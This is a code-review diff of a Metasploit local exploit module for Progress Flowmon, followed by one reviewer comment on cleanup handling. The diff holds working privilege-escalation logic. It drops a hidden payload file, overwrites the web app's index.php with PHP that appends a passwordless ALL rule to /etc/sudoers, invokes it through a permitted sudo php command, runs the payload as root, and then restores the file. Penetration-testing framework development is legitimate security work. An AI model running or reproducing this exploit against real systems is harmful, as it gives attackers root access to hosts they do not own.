modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb

```diff
@@ -61,25 +61,34 @@ def check
     return CheckCode::Safe
   end
 
-  def exploit
-    if exists?(datastore['TEMP_PAYLOAD'])
-      fail_with(Msf::Module::Failure::BadConfig, "#{datastore['TEMP_PAYLOAD']} exists on host; chose another name.")
+  def on_new_session(session)
+    super
+    print_status('Cleaning up addition to /etc/sudoers')
+    if session.type.to_s.eql? 'meterpreter'
+      session.sys.process.execute '/bin/sh', "-c \"sed -i '/^ADMINS ALL=(ALL) NOPASSWD: ALL$/d' /etc/sudoers\""
+    elsif session.type.to_s.eql? 'shell'
+      session.shell_command_token 'sed -i \'/^ADMINS ALL=(ALL) NOPASSWD: ALL$/d\' /etc/sudoers'
     end
+  end
 
-    vprint_status("Saving payload as #{datastore['TEMP_PAYLOAD']}")
-    write_file(datastore['TEMP_PAYLOAD'], generate_payload_exe)
-    chmod(datastore['TEMP_PAYLOAD'])
-    register_file_for_cleanup(datastore['TEMP_PAYLOAD'])
+  def exploit
+    fail_with(Failure::BadConfig, "#{datastore['WRITABLE_DIR']} is not writable") unless writable?(datastore['WRITABLE_DIR'])
+    exploit_file = "#{datastore['WRITABLE_DIR']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
 
-    print_status('Copying /var/www/shtml/index.php to /tmp/index.php.bak')
-    cmd_exec('cp /var/www/shtml/index.php /tmp/index.php.bak')
+    vprint_status("Saving payload as #{exploit_file}")
+    write_file(exploit_file, generate_payload_exe)
+    chmod(exploit_file)
+    register_file_for_cleanup(exploit_file)
+    index_php_contents = read_file('/var/www/shtml/index.php')
     print_status('Overwriting /var/www/shtml/index.php with payload')
     cmd_exec('echo \'<?php system("echo \\"ADMINS ALL=(ALL) NOPASSWD: ALL\\" >> /etc/sudoers"); ?>\' > /var/www/shtml/index.php;')
     print_status('Executing sudo to elevate privileges')
     cmd_exec('sudo /usr/bin/php /var/www/shtml/index.php Cli\\:AddNewSource s;')
-    print_status('Replacing index.php with original file')
-    cmd_exec('cp /tmp/index.php.bak /var/www/shtml/index.php')
-    cmd_exec("sudo '#{datastore['TEMP_PAYLOAD']}'")
+    cmd_exec("sudo '#{exploit_file}'")
+
+    print_status('Restoring /var/www/shtml/index.php file contents...')
+    file_rm('/var/www/shtml/index.php')
+    write_file('/var/www/shtml/index.php', index_php_contents)
   ensure
     cleanup
```

Comment:
Is it necessary to call `#cleanup` in an ensure block? I'm under the impression the Framework will do this already.